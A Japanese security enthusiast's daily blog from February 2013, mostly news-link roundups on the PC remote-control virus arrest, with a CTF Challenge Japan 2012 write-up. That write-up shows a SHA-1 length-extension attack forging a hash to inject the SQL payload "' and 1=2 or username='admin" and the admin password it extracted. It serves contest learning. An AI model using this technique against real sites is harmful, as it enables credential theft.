不正解だった。同様の方法で、Flagを3位にして、自分が僅差で2位になる値を探し求めたところ、af0d377e68ab5960da275e489165bfba が得られた。→ ダメ元で答えとして送信してみたら、正解だった。まったく意味がわからない。。

2013/02/10(日)日曜日ー。（tracert 216.81.59.173 がスターウォーズ的な。）

[雑談] いろいろ。

遠隔操作事件都内の３０歳男を逮捕 (NHKニュース)

エラー｜NHK NEWS WEB

http://www.nikkansports.com

ＰＣ遠隔操作事件で逮捕江東区の30歳男 (nikkansports.com)

お探しのページが見つかりません : 日刊スポーツ

PC遠隔操作事件で逮捕の男、「のまネコ」騒動で殺害予告の過去 (ITmedia ニュース)

PC遠隔操作事件で逮捕の男、「のまネコ」騒動で殺害予告の過去

PC遠隔操作事件で逮捕された男は、2005年に起きた「のまネコ」騒動でエイベックスに対する殺害予告を書き込んだとして逮捕された人物だったという。

　一連の遠隔操作ウイルス事件における真の狙いは、犯人の主張を信じれば「警察をはめる」という部分にある。だが、警察は法的にそうした点に対して直接的には動けず、爆破予告や殺人予告とウイルスの作成や供用で動

最新サイバー攻撃に備える: 【緊急寄稿】容疑者の逮捕が事件の終わりではない (ITpro)

【緊急寄稿】容疑者の逮捕が事件の終わりではない

2012年10月から世間を騒がせていた「iesys.exe」を使ったPCの遠隔操作事件で、警視庁が威力業務妨害容疑で東京都江東区に住む男(30)の逮捕状を取ったことが明らかになりました。2月10日中に

「iesys.exe」遠隔操作ウイルス事件で警視庁が都内の男を逮捕へ (GIGAZINE)

「iesys.exe」遠隔操作ウイルス事件で警視庁が都内の男を逮捕へ

解説・なぜ容疑者を特定できたのか (NHKニュース)

エラー｜NHK NEWS WEB

遠隔操作事件都内の男に任意同行求める (NHKニュース)

エラー｜NHK NEWS WEB

遠隔操作ウイルス都内の３０歳男に逮捕状 (NHKニュース)

エラー｜NHK NEWS WEB

http://masatokinugawa.l0.cm

Masato Kinugawa Security Blog: Twitterの脆弱性 2013

Masato Kinugawa Security Blog: Twitterの脆弱性 2013

216.81.59.173 に traceroute すると面白いという話を聞いたのでやってみた。 (koyhoge)

tumblr::koyhoge

216.81.59.173 に traceroute すると面白いという話を聞いたのでやってみた。 % traceroute 216.81.59.173 (略) 12 epik-networks-g

http://koyhoge.tumblr.com

2013/02/11(月)月曜日ー。（こんな形で猫カフェが一般に認知されるとは。）

[雑談] いろいろ。

遠隔操作派遣先のパソコンで書き込みか (NHKニュース)

エラー｜NHK NEWS WEB

iza（イザ！）は産経デジタルが運営する総合ニュースサイトです。政治、経済、国際、社会、スポーツ、芸能といったさまざまなジャンルの記事をご覧いただけます。

追い詰めたのは江の島の最新鋭防犯カメラ捜査員「なかったらと思うとぞっとする」 (イザ！)

iza（イザ！）総合ニュースサイト：産経デジタル

http://www.iza.ne.jp

ＰＣ遠隔操作: ネット時代の「劇場型犯罪」どこまで解明 (毎日ｊｐ/毎日新聞)

| 毎日新聞

逮捕の男携帯に記憶媒体つけた猫の写真 (NHKニュース)

エラー｜NHK NEWS WEB

捜査かく乱など特異な展開の事件に (NHKニュース)

エラー｜NHK NEWS WEB

【なりすましウイルス】残るサイバー犯罪捜査の弱点政府全体での態勢強化急務 (MSN)

http://sankei.jp.msn.com/affairs/news/130210/crm13021023130024-n1.htm

4人の誤認逮捕を生んだ遠隔操作事件は片山祐輔容疑者（30）の逮捕で大きな節目を迎えたが、同容疑者が現実空間に姿を現した勇み足"に助けられた面が強い。今回浮き彫りになった「サイバー犯罪に警察の独力では対

サイバー捜査に限界民間との連携が必須 (日本経済新聞)

サイバー捜査に限界　民間との連携が必須 - 日本経済新聞

ＰＣ遠隔操作: 片山容疑者ネットカフェや猫カフェ出入り (毎日ｊｐ/毎日新聞)

| 毎日新聞

【なりすましウイルス】ちらつく過信と自己顕示欲現実空間に現れて墓穴？ (MSN産経)

http://sankei.jp.msn.com/affairs/news/130210/crm13021023510025-n1.htm

逮捕の３０歳男、平成１７年にも逮捕大手レコード会社社長らの殺害予告容疑 (MSN産経)

http://sankei.jp.msn.com/affairs/news/130210/crm13021009470005-n1.htm

PC遠隔操作容疑者逮捕前に警察が情報漏洩していたことについて　国家権力を使った晒し上げ

サイバー捜査増す難易度海外当局も苦慮 (朝日新聞デジタル)

http://www.asahi.com/national/update/0210/TKY201302100253.html

http://www.asahi.com

PC遠隔操作容疑者逮捕前に警察が情報漏洩していたことについて (ガジェット通信)

PC遠隔操作容疑者逮捕前に警察が情報漏洩していたことについて　国家権力を使った晒し上げ｜ガジェット通信 GetNews

http://getnews.jp

NmapのNSEスクリプト「upnp-info」を使ってみた (思い立ったら書く日記)

NmapのNSEスクリプト「upnp-info」を使ってみた - 思い立ったら書く日記

Nmap の NSE(Nmap Scripting Engine)スクリプト「upnp-info」を使ってみたところ、使用前に思っていた実行結果と異なっていたため、スクリプトを一部編集してみました。こ

勇士QさんのKernel/VM Advent Calendar 18日目: CTF 暗号問題 - 勇士Qの日記の問題の解答を書かせて頂きます。まだ、解いていなくて、挑戦したいと言う方は以下、ネタバレを

[CTF] CTFチャレンジジャパン2012 Write-Up: サービスアタック400 「Crack me」ol li{margin-left:15px;padding-bottom:5px}pre{white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-o-pre-wrap;white-space:-pre-wrap;word-wrap:break-word;}問題文

textile管理者のパスワードを答えなさい。貴方のアカウントは、test/testです。

試したことまず、URLを開き、問題文にあった、test/testでログインしてみた。![](/image/CTFjpn/CrackMe1.png)ユーザの一覧が表示されたので、自分（test）をクリックしたところ、パスワードを含む会員情報が表示された。自分以外の名前をクリックした時は、パスワードの欄が無い会員情報が表示された。![](/image/CTFjpn/CrackMe2.png)ユーザ一覧の画面のHTMLソースを見てみたところ、以下のようになっていた。

textile<li><a href="detail.cgi?user=admin">Administrator</a></li><li><a href="detail.cgi?user=demo">DEMO user</a></li><li><a href="detail.cgi?user=test&hash=fd4f135ca36f53ca7470a187cc4cddf0965581ff">Test user</a></li>

どうやら、detail.cgiに渡す、hashというパラメータがキーになっているようだ。問題文のZIPファイルに、detail.cgiの抜粋版ソースコードがあったので見てみる。

textileif($hash){ my $salt = get_salt(); my $string = "salt=$salt&user=$username"; if($hash eq sha1_hex($string)){ my $sql = "SELECT id,username,password,name FROM user WHERE username='$username'"; my @ret = $dbh->selectrow_array($sql); print_detail($myname, { id => $ret[0], username => $ret[1], password => $ret[2], name => $ret[3] }); } else { error('security error'); }} else { my $sql = "SELECT id,username,name FROM user WHERE username=?"; my @ret = $dbh->selectrow_array($sql, undef, $username); if($username){ print_other($myname, { id => $ret[0], username => $ret[1], name => $ret[2] }); } else { error('no such user'); }}

hashの計算方法は分かったが、$saltの値（get_salt関数のソースコード）が分からないので、一見、自分でhashの計算はできないように見える。でも、その次の行のSQL文を見ても、（他のすべてのSQL文はプリペアードステートメントが使われているのに）ここだけ文字列で組み立てていて、いかにも、SQLインジェクションを仕掛けてくださいというメッセージが伝わってくる。これは、前にStripe-CTFで苦戦させられた、SHA-1 Padding Attackだとピンときた。```textileSHA1 padding attack - yasulib memo

SHA1 padding attack - yasulib memo

http://www.vnsecurity.net

textileCodeGate 2010 Challenge 15 – SHA1 padding attack : VNSECURITY / CLGT TEAM

Checking your browser...

```この攻撃を使うと、「何か秘密の文字列」＋「ユーザが指定できる任意の文字列」をSHA-1でハッシュ化している時に、秘密の文字列は分からないまま、任意の文字列を追加した新しいハッシュ値を計算することができる。SELECT id,username,password,name FROM user WHERE username='test' というSQL文の、testの部分に「' and 1=2 or username='admin」を追加して送信することができれば、Administratorのパスワードが画面に表示されるはず。VNSECURITY TEAMのRDさんが公開している、* sha-padding.py/image/CTFjpn/sha-padding.py.txt

、* shaext.py/image/CTFjpn/shaext.py.txt

、* sha.py/image/CTFjpn/sha.py.txt

を使って、keylenを1から順に増やしながら送信したところ、35で以下の画面が表示された。

textilenew msg: "\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x18' and 1=2 or username='admin"base64: gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARgnIGFuZCAxPTIgb3IgdXNlcm5hbWU9J2FkbWlunew sig: 85b16a59fdc238b3b8c2014149dd1aecf47fae2d HTTP/1.1 200 OKDate: Sun, 03 Feb 2013 14:28:11 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8 25c<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" href="/final/style.css"><title>Crack me</title></head><body><h1>Crack me</h1>test さん、こんにちは</p><div class="logout"><a href="logout.cgi">ログアウト</a></div><hr><p>あなたの情報</p><table border="1"><tr><th>ID</th><td>1</td></tr><tr><th>username</th><td>admin</td></tr><tr><th>password</th><td>696b3365892c9485456ad672eb1000af</td></tr><tr><th>name</th><td>Administrator</td></tr></table><a href="users.cgi">一覧に戻る</a></body></html>0

答えは、「696b3365892c9485456ad672eb1000af」。

2013/02/12(火)火曜日ー。（遊園地のアトラクション的な感じだった。）

[CTF] CTFチャレンジジャパン2012 全国大会: WriteUpまとめ

サービスアタック100 「不正行為をしたユーザーを突き止めろ！」 - 糸の切れた凧

a threadless kite - 糸の切れた凧

管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。

管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。

暗号解読100 「読みにくい画像の文字」 - 糸の切れた凧(2013-02-05)

a threadless kite - 糸の切れた凧

管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。

フォレンジック100 「パッケージのタイトルは何？」 - 糸の切れた凧(2013-02-04)

a threadless kite - 糸の切れた凧

Binary 100 - とある脆弱性の攻撃用機械語(シェルコード)

CTF Challenge Japan(Final) Write Ups - Binary 100

管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。

暗号解読200 「スパイからのメール」 - 糸の切れた凧(2013-02-07)

a threadless kite - 糸の切れた凧

管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。

サービスアタック200 「Emailのログを盗み出せ！」 - 糸の切れた凧(2013-02-06)

a threadless kite - 糸の切れた凧

Service Attack 200 - とある脆弱性の攻撃用機械語(シェルコード)

CTF Challenge Japan(Final) Write Ups - Service Attack 200

管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。

サービスアタック300 「Make your bet!」 - 糸の切れた凧(2013-02-09)

a threadless kite - 糸の切れた凧

管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。

サービスアタック400 「Crack me」 - 糸の切れた凧(2013-02-11)

a threadless kite - 糸の切れた凧

[雑談] いろいろ。

「全く事実ではない」逮捕の男は容疑を否認　PC遠隔操作事件 (ITmedia ニュース)

IT総合情報ポータル「ITmedia」Home

PC遠隔操作事件で逮捕の男、「のまネコ」騒動で殺害予告の過去 (ITmedia ニュース)

PC遠隔操作事件で逮捕の男、「のまネコ」騒動で殺害予告の過去

　2013年1月27日に実施された「国家検定ファイナンシャル・プランニング技能検定試験（FP技能検定試験）」の試験問題が事前に漏洩したトラブルを巡って、試験実施団体は2月12日、試験は「有効」であるこ

FP検定は「有効」、Webサーバーへの“不慣れ”が試験問題漏洩招く (ITpro)

FP検定は「有効」、Webサーバーへの“不慣れ”が試験問題漏洩招く

Facebookがかなり本格的なインシデントレスポンスの訓練を実施していることは以前から有名ですが、Ars Technicaにその訓練内容についての記事が出ていました。At Facebook, zer

Facebookが狙われた!? "Operation Loopback" - セキュリティは楽しいかね？ Part 2

Facebookが狙われた!? Operation Loopback" - セキュリティは楽しいかね？ Part 2

http://negi.hatenablog.com

2012年下半期 Tokyo SOC 情報分析レポート公開 (Tokyo SOC Report)

IBM Blogs

https://www-304.ibm.com

日本へのサイバー攻撃、通信78億件　攻撃手法が多様化 (ITmedia ニュース)

IT総合情報ポータル「ITmedia」Home

http://www.computerworld.jp

マカフィー、「恋愛、人間関係、テクノロジーに関する調査」を発表 (Computerworld)

http://www.computerworld.jp/topics/563/206384

Password hashes dump tools

ページが見つかりません

ウェブワープロ、プレゼンテーション、スプレッドシート

https://docs.google.com

Security Engineering - A Guide to Building Dependable Distributed Systems

Security Engineering - A Guide to Building Dependable Distributed Systems

http://www.cl.cam.ac.uk

Introducing ModSecurity IIS 2.7.2 Stable Release (TechNet Blogs)

Archived MSDN and TechNet Blogs

http://blogs.technet.com

メディアを沸かせた凶悪事件の年齢がほどんど同じだとネットで話題に (マイナビニュース)

ページが見つかりません

http://news.mynavi.jp

高校生7人が吊り橋を渡っている最中、ワイヤーが切れて大きく傾く→全員セーフ

404 Not Found | このページは存在しないか、すでに削除されています

Tech総研『エンジニアあるある』カテゴリの『理系的？ビンゴゲームの楽しみ方／理系の人々』。結婚式の二次会で恒例のビンゴゲーム。当たっても当たらなくても、自分なりの楽しみ方があれば面白いかも……毎度お

理系の人々: 理系的？ビンゴゲームの楽しみ方 (Tech総研)

理系的？ビンゴゲームの楽しみ方／理系の人々｜【Tech総研】

http://next.rikunabi.com

思わず引いた…男子からのあり得ない告白 (セキララ★ゼクシィ)

思わず引いた…男子からのあり得ない告白-セキララ★ゼクシィ

「男子は一生懸命なんだけど、女からすればドン引き」なんてあり得ない告白、ありますよね。男子には申し訳ないけど必死過ぎたり、あり得なさすぎでドン引きしちゃうんですよね。男と女のホンネからイマドキ事情まで

ニャンニャンニャン！　ニャンコはとっても可愛いのだ！　それがよちよち赤ちゃんニャンコになるともう大変。それが5匹も6匹も集団で来られたら、もう人類はキュン死ぬし …

赤ちゃんニャンコにミルクをあげようとしたらあっという間にニャンコまみれに!!

【キュン死】赤ちゃんニャンコにミルクをあげようとしたらあっという間にニャンコまみれに!!

【2月13日 AFP】米国版の緊急警報放送に12日、ハッカーが侵入してモンタナ（Montana）州のテレビ放送を一部中断し、「ゾンビの襲来」という奇妙な警告を発する事件が起きた。

2013/02/13(水)水曜日ー。（ミント味の歯磨き粉で作る、チョコミント？）

[雑談] いろいろ。

「ゾンビ襲来」？ハッカーが米緊急警報を乗っ取り (AFPBB News)

「ゾンビ襲来」？ハッカーが米緊急警報を乗っ取り

http://www.afpbb.com

なりすまし（遠隔操作）ウイルスによる犯行予告事件、逮捕関連をまとめてみた。 - piyolog

なりすまし（遠隔操作）ウイルスによる犯行予告事件、逮捕・起訴・公判関連の情報をまとめてみた。 - piyolog

概要 4人が誤認逮捕された遠隔操作による犯行予告事件の被疑者とされる東京都男性が2月10日に任意同行を受け、その後逮捕、翌11日に送検されました。その後3月3日に処分保留とし釈放されましたが、同日別件

今日の新聞朝刊は各紙（読売、朝日、産経、毎日、日経、東京新聞）とも1面と社会面で遠隔操作事件を扱っている。全部を読んでまとめてみるby 高木浩光

高木浩光先生の「今日の新聞朝刊は各紙で遠隔操作事件を扱っている。全部まとめてみる」

高木浩光先生@HiromitsuTakagiの「今日の新聞朝刊は各紙（読売、朝日、産経、毎日、日経、東京新聞）とも1面と社会面で遠隔操作事件を扱っている。全部を読んでまとめてみる」

http://togetter.com

まとめのまとめ 2013年1月版：新年早々脆弱性と謎解きメールに右往左往 (＠IT)

新年早々脆弱性と謎解きメールに右往左往

2013年の年明けは、脆弱性ではなく、自称「遠隔操作ウイルス事件の犯人」からの手紙で慌ただしく幕を開けました。

「嘘をつかれたから元恋人の個人情報を漏えいさせた」 45％、米調査結果 (Scan)

エラー

「お前の裸をネットにアップしてやる」。別れたカップルのうち10人に1人が、こうした脅迫まがいの言葉を相手に浴びせている──米国での調査結果。

「お前の裸をネットにアップしてやる」 10人に1人が元恋人を“脅迫”　米調査 (ITmedia)

「お前の裸をネットにアップしてやる」──10人に1人が元恋人を“脅迫”　米調査

あるAnonymous Coward 曰く、先日、Samsungの一部のノートパソコンでLinuxを起動するとファームウェアが破壊されるという問題が発覚した。UFEIの実装のまずさが問題だったようだが

Samsung製の一部ノートパソコンを壊す実証コードが公開される (/.jp)

Samsung製の一部ノートパソコンを壊す実証コードが公開される | スラド

http://mobile.slashdot.jp

ネットワンシステムズで不正発覚社員ら架空請求、総額7億円超か (ITmedia)

ネットワンシステムズで不正発覚　社員ら架空請求、総額7億円超か

ネットワーク専業のネットワンシステムズで社員が関わる架空請求が発覚。総額7億4800万円に上る可能性があるという。

人工DNAを含有し、第三者による模倣が「ほぼ不可能」でなインクをDNPなどが開発。紙幣や金券などの偽造防止に活用できるとしている。

人工DNA入り印刷用インク開発「模倣ほぼ不可能」で偽札防止に (ITmedia)

人工DNA入り印刷用インク開発　「模倣ほぼ不可能」で偽札防止に

ええ！ U2型偵察機のパイロットのご飯って、こんなんなのかぁ... (GIZMODO)

ええ！U2型偵察機のパイロットのご飯って、こんなんなのかぁ...（動画）

壁にセンサーを取り付けておくことで、ゴミを放り投げるとゴミ箱が落下点を予測して拾いに走って行くというガジェットが「勝手に入るゴミ箱」。ワールドビジネスサテライトでも取り上げられていますが、第16回文化

京王線の編成がカオス！武蔵野台駅での人身事故でどうかしちまった - NAVER まとめ

サービス終了のお知らせ - NAVER まとめ

NAVERまとめサービス終了のお知らせ

http://matome.naver.jp

「勝手に入るゴミ箱」を文化庁メディア芸術祭会場で実演しているムービー (GIGAZINE)

「勝手に入るゴミ箱」を文化庁メディア芸術祭会場で実演しているムービー

http://photo.sankei.jp.msn.com

第8回あなたが選ぶオタク川柳 (インターリンク)

http://www.575.cc/

http://www.575.cc

2013/02/14(木)木曜日ー。（社内にブラックサンダーチョコが溢れてる～）

[雑談] いろいろ。

一目で義理とわかる「ブラックサンダー」無料配布が大人気 (MSN産経フォト)

http://photo.sankei.jp.msn.com/kodawari/data/2013/02/08blackthunder/

Adobe ReaderとAcrobatに未解決の脆弱性情報、不正なPDF出回る (ITmedia)

Adobe ReaderとAcrobatに未解決の脆弱性情報、不正なPDF出回る

Adobe ReaderとAcrobatの最新版にまた未解決の脆弱性が報告された。内容が不明なPDFファイルを開いてはいけない。

　ソフォスは14日、テレビ局の緊急速報システムがハッキングされ、「ゾンビ襲来」の緊急速報がテレビに流された事例を公表した。

「ゾンビ襲来」を伝える緊急速報が、テレビで放映…テレビ局をハッキング (RBB TODAY)

「ゾンビ襲来」を伝える緊急速報が、テレビで放映……ハッカーがテレビ局をハッキング［動画］ | RBB TODAY

http://www.rbbtoday.com

【なりすましウイルス】片山容疑者、またミスかメアド作成時に派遣先郵便番号 (MSN)

http://sankei.jp.msn.com/affairs/news/130214/crm13021402070001-n1.htm

　ネット掲示板などに犯行声明が書き込まれた「遠隔操作ウイルス」事件で、容疑者が逮捕された。この事件では、犯人が通信元を巧妙に秘匿していたことから、警察が4人を誤認逮捕するという事態にまで発展した。その

IPアドレス頼りの捜査で取り違え、痕跡消す遠隔操作ウイルスで混乱 (ITpro)

IPアドレス頼りの捜査で取り違え、痕跡消す遠隔操作ウイルスで混乱

「激裏情報」運営者逮捕 B-CAS書き換えプログラムをネット販売 (ITmedia ニュース)

IT総合情報ポータル「ITmedia」Home

ログファイルなどの行指向のテキストデータを加工するタスクでは、多くの場合、awkやsed、あるいはperlなどのプロセスをパイプで組み合わせる、いわゆるワンライナー的なアプローチがよく使われます。ま

テキストデータ処理を簡単にマルチコア対応にするJavaフレームワーク、MCPの実装

テキストデータ処理を簡単にマルチコア対応にするJavaフレームワーク、MCPの実装

http://www.scutum.jp

ハッカー養成学院のサイト、ハッキングされる - ねとらぼ

ハッカー養成学院のサイト、ハッキングされる

身をもって教えてくれた、セキュリティ対策への教訓とは。

http://nlab.itmedia.co.jp

ハッキング事件2.13のお詫びと解析結果及び解説 (ハッカー養成学院公式ブログ)

404 Error - Not Found

http://www.whitehackerz.jp

ネット選挙運動「なりすまし」に公民権停止の罰則も自公最終案 (ITmedia ニュース)

IT総合情報ポータル「ITmedia」Home

http://business.nikkeibp.co.jp

20代の社員に「アホは出口さんです」と言われました (日経ビジネスオンライン)

お探しのページが見つかりませんでした：日経ビジネス電子版

営業マンがお辞儀をすべきでない理由 (ライフハッカー［日本版］)

営業マンがお辞儀をすべきでない理由 | ライフハッカー・ジャパン

WORK FAST, LIVE SLOW.仕事を充実させ、生活を楽しむ。ビジネスはスマートに、暮らしは豊かに。ポジティブに生きるために現実を見据えて考えたい人のための自分グロースメディア。

http://www.lifehacker.jp

なにこれ欲しい！見事に予想外の動きをするキャンドルが話題 (ロケットニュース24)

http://rocketnews24.com/2013/02/14/293207/

Find the latest technology news and expert tech product reviews. Learn about the latest gadgets and

2013/02/15(金)金曜日ー。（隕石降ってくるとか怖い。）

[雑談] いろいろ。

iPhoneにまたロック画面迂回バグ、通話履歴や電話帳・写真にアクセス (Engadget)

Engadget | Technology News & Reviews

http://japanese.engadget.com

ログアウト機能の目的と実現方法 (徳丸浩の日記)

ログアウト機能の目的と実現方法

このエントリでは、Webアプリケーションにおけるログアウト機能に関連して、その目的と実現方法について説明します。議論の前提このエントリでは、認証方式として、いわゆるフォーム認証を前提として

http://blog.tokumaru.org

2012年の不正アクセス届出から読み解く、ウェブ改ざん被害の事例、傾向と対策 (IPA)

IPA 独立行政法人情報処理推進機構

https://www.ipa.go.jp

日本だけを狙う「バンキングトロイ」が出現 (ITmedia エンタープライズ)

日本だけを狙う「バンキングトロイ」が出現

大手5行のオンラインバンキング利用者を標的にしているとみられるマルウェアが確認された。

　シマンテックは2013年2月13日、国内のネットバンクユーザーを狙った新しいウイルス（悪質なプログラム）が確認されたとして注意を呼びかけた。ウイルスに感染したパソコンで国内大手銀行5行のネットバンク

国内のネットバンクユーザーを狙った新ウイルス、日本でのみ感染報告 (ITpro)

国内のネットバンクユーザーを狙った新ウイルス、日本でのみ感染報告

シマンテックによると、オンラインバンキングサービスを狙うトロイの木馬「Zeus」に、日本の大手銀行の利用者のみを標的にする亜種が登場した。

「普段と違う表示に注意」日本の銀行を標的にした「Zeus」亜種、登場 (＠IT)

日本の銀行を標的にした「Zeus」亜種、登場

　今回は、トレンドマイクロが、米大手新聞のニューヨークタイムズが受けた攻撃を題材にまとめた、解説記事から紹介しよう。ニューヨーク・タイムズは、数カ月前から同社システムが受けていた標的型（APT：Adv

世界のセキュリティ・ラボから: ニューヨークタイムズへのサイバー攻撃から学ぶこと (ITpro)

ニューヨークタイムズへのサイバー攻撃から学ぶこと

Acrobat XIの「保護されたビュー」はデフォルトでは無効になっているが、有効にすれば、脆弱性を突いた攻撃をかわすことができるという。

Adobe、PDF攻撃対策を勧告「保護されたビュー」の有効化を (ITmedia)

Adobe、PDF攻撃対策を勧告　「保護されたビュー」の有効化を

http://www.computerworld.jp

70％以上のユーザー、「脆弱性があってもソフトウェア・アップデートに消極的」

http://www.computerworld.jp/topics/563/206429

トロイの木馬型の「Police」ランサムウェアのギャングが逮捕 (エフセキュアブログ)

http://blog.f-secure.jp/archives/50693976.html

･ﾕ･｣･鬣ﾉ､ﾎ･ｻ･ｭ･螂�･ﾆ･｣ｴ�ｶﾈ｡｢･ｨ･ﾕ･ｻ･ｭ･螂｢､ﾎ･ｻ･ｭ･螂�･ﾆ･｣ｸｦｵ貎熙ｬﾄ｡､ｷ､ﾆ､､､�ﾀ､ｳｦﾃ讀ﾎ･ｻ･ｭ･螂�･ﾆ･｣､ﾎｺﾇｿｷﾆｰｸ�､ﾈﾆ

http://blog.f-secure.jp

“迷探偵”ハギーのテクノロジー裏話：「遠隔操作ウイルス事件」を斜めから読み解く

「遠隔操作ウイルス事件」を斜めから読み解く

今回はあまりにも有名な「遠隔操作ウイルス事件」について解説しよう。ただし、真っ当な解説はそれこそ何百と既にあるので、ピンポイントで「誤認逮捕の問題」そして「不作為の罪」の2点で意見を述べてみたい。

サイバー護身術: 遠隔操作ウイルス事件、警察とメディアの課題 (YOMIURI ONLINE)

PC遠隔操作なりすましウィルス事件　容疑者逮捕　えん罪事件がさらに起こらないよう厳重な監視を！

PC遠隔操作なりすましウィルス事件: えん罪事件がさらに起こらないよう厳重な監視を！

PC遠隔操作なりすましウィルス事件　容疑者逮捕　えん罪事件がさらに起こらないよう厳重な監視を！｜ガジェット通信 GetNews

http://getnews.jp

初めての裁判傍聴（JPNICが訴えられた件について） (廃人日記)

http://blog.redwell.jp/?p=537

http://blog.redwell.jp

ネイティブに伝わるビジネス英語：ネイティブに電話―姓と名、どっちを言えばいいの？

ネイティブに電話――姓と名、どっちを言えばいいの？

第8回は、電話をかけるとき使えるフレーズ。電話のマナーは日本とほとんど変わりません。まず、自分について名乗ってから、話をしたい相手を指定しましょう。

顧客満足向上やサービス向上についての取り組みを行う上で、しばしば聞かれる「いかにお客さまに喜んでいただくか」という言葉。しかし、筆者はそこに落とし穴があると指摘します。

「いかにお客さまに喜んでいただくか」は間違っている!? (Business Media 誠)

「いかにお客さまに喜んでいただくか」は間違っている!?

http://newsbiz.yahoo.co.jp

レジ袋有料化でスーパー二極化: 中小は慎重姿勢「客離れ招きかねない」 (SankeiBiz)

サービス終了のお知らせ

『日清ラ王袋麺屋』味玉＆チャーシュー入りで250円の激安っぷりで大阪進出キター！

http://rocketnews24.com/2013/02/15/293610/

Yahoo!ニュースは、新聞・通信社が配信するニュースのほか、映像、雑誌や個人の書き手が執筆する記事など多種多様なニュースを掲載しています。

ウラル上空「世界大戦」を髣髴させる現象発生 (The Voice of Russia)

http://japanese.ruvr.ru/2013_02_15/roshia-cheryabinsuku-shouwakesei/

http://japanese.ruvr.ru

Video of meteorite explosion that stirred panic in Urals region - YouTube

依頼者は私だけど…「別れさせ屋は違法、契約無効」提訴 (朝日新聞デジタル)

Yahoo!ニュース

http://headlines.yahoo.co.jp

バレンタインデーに関する人気ツイートまとめ - さまざまなめりっと

バレンタインデーに関する人気ツイートまとめ - さまざまなめりっと

女性の７割「デート代はおごれ」・・・「おごらない＝男気がない」 (ハムスター速報)

404 Not Found | このページは存在しないか、すでに削除されています

http://hamusoku.com

2013/02/16(土)土曜日ー。（あぽかりぷす・なう？）

[雑談] いろいろ。

【ロシア隕石落下】重さ７千トン直径１５メートル衝撃波、広島型原爆の２０倍近く (MSN)

http://sankei.jp.msn.com/world/news/130216/erp13021610360001-n1.htm

ＰＣ遠隔操作: 容疑者逮捕１週間立件へのハードルを検証 (毎日ｊｐ/毎日新聞)

| 毎日新聞

ネット殺人予告: 遠隔操作書き込み、片山容疑者の勤務と重なりＰＣ解析、カギ (毎日新聞)

| 毎日新聞

ウイルスに片山容疑者の情報＝米サーバーに、ＦＢＩ押収－ＰＣ遠隔操作 (時事ドットコム)

時事ドットコム

高木浩光先生による遠隔操作ウィルス事件に関する考察のまとめです本当ならば、話がひっくり返るレベルの大問題かもしれません読売新聞の記事によると、（接見した弁護士の話として）、「容疑者はウィルス作成に..

「遠隔操作ウィルス事件の容疑者が、C#での開発経験が無かった可能性」に関する考察

（本当なら大問題）高木浩光先生による「遠隔操作ウィルス事件の容疑者が、C#での開発経験が無かった可能性」に関する考察

http://togetter.com

Facebook、ハッキング被害を認める--ユーザーデータは無事と発表 (CNET Japan)

Facebook、ハッキング被害を認める--ユーザーデータは無事と発表

Facebookは、同社のシステムが1月にハッキングされていたことを認めた。ただし、ユーザーデータは危険にさらされていないと述べている。

「高度なハッカー攻撃」米フェイスブックが標的 (YOMIURI ONLINE/読売新聞)

「サイバー空間防衛隊」新設へ検討委…防衛省 (YOMIURI ONLINE/読売新聞)

気になるラーメン屋「交通安全ラーメンセンター」。どのあたりが交通安全なのだろう。 (玉置標本)

Web Application Vulnerability Testing with Nessus (OWASP)

https://www.owasp.org/images/4/4f/Web_Application_Vul_Testing_with_Nessus_2012.02.01.pdf

https://www.owasp.org

デイリーポータルZ：交通安全ラーメンセンターの謎に迫る

交通安全ラーメンセンターの謎に迫る

http://portal.nifty.com

フクロウカフェがかなり来てる

フクロウカフェがかなり来てる

すぐ近くでコーヒーを飲みながらフクロウを撫でることができる猛禽類カフェをめぐった。 (きだてたく)

http://portal.nifty.com

2013/02/17(日)日曜日ー。（第２のチェルノブイリ？第３のチェルノブイリ？）

[雑談] いろいろ。

片山容疑者「真犯人が自分の無実の罪はらして」 (読売新聞) - livedoor ニュース

片山容疑者「無実の罪はらして」 - ライブドアニュース

会社のパソコンが遠隔操作され、殺人予告が書き込まれた事件。片山容疑者は事件への関与を一貫して否認。「真犯人が再度メールを送って、自分の無実の罪をはらしてほしい」と話している

http://hochi.yomiuri.co.jp

片山容疑者の弁護士、無罪「確信」…ＰＣ遠隔操作事件 (スポーツ報知)

http://hochi.yomiuri.co.jp/topics/news/20130217-OHT1T00037.htm

遠隔操作事件片山祐輔（丑田祐輔）容疑者の2005年の犯行予告事件の詳細記録

【特別再再掲】遠隔操作事件　片山祐輔被告の2005年の連続ネット犯行予告事件の詳細記録

遠隔操作ウイルス事件ので注目を浴びた犯人の、2005年に起こした犯行予告事件（通称「のまネコ事件」他）の詳細記録。犯行文全文も収録。

http://netjikenbo.no.land.to

SQLアンチパターン - 開発者を待ち受ける25の落とし穴 (by Takuto Wada)

SQLアンチパターン - 開発者を待ち受ける25の落とし穴

【15-B-5】SQLアンチパターン - 開発者を待ち受ける25の落とし穴 2013/02/15 デブサミ 2013

http://www.slideshare.net

隕石、周辺に核施設も「危うく第２のチェルノブイリ」 (朝日新聞デジタル)

http://digital.asahi.com/articles/TKY201302160251.html

Yahoo!ニュースは、新聞・通信社が配信するニュースのほか、映像、雑誌や個人の書き手が執筆する記事など多種多様なニュースを掲載しています。

免許離れで競争激化の教習所鬼教官消え接客業の意識高まる (NEWS ポストセブン)

Yahoo!ニュース

http://zasshi.news.yahoo.co.jp

平均年収1000万円以上の人が、就活生に勧める企業はどこ？ (Business Media 誠)

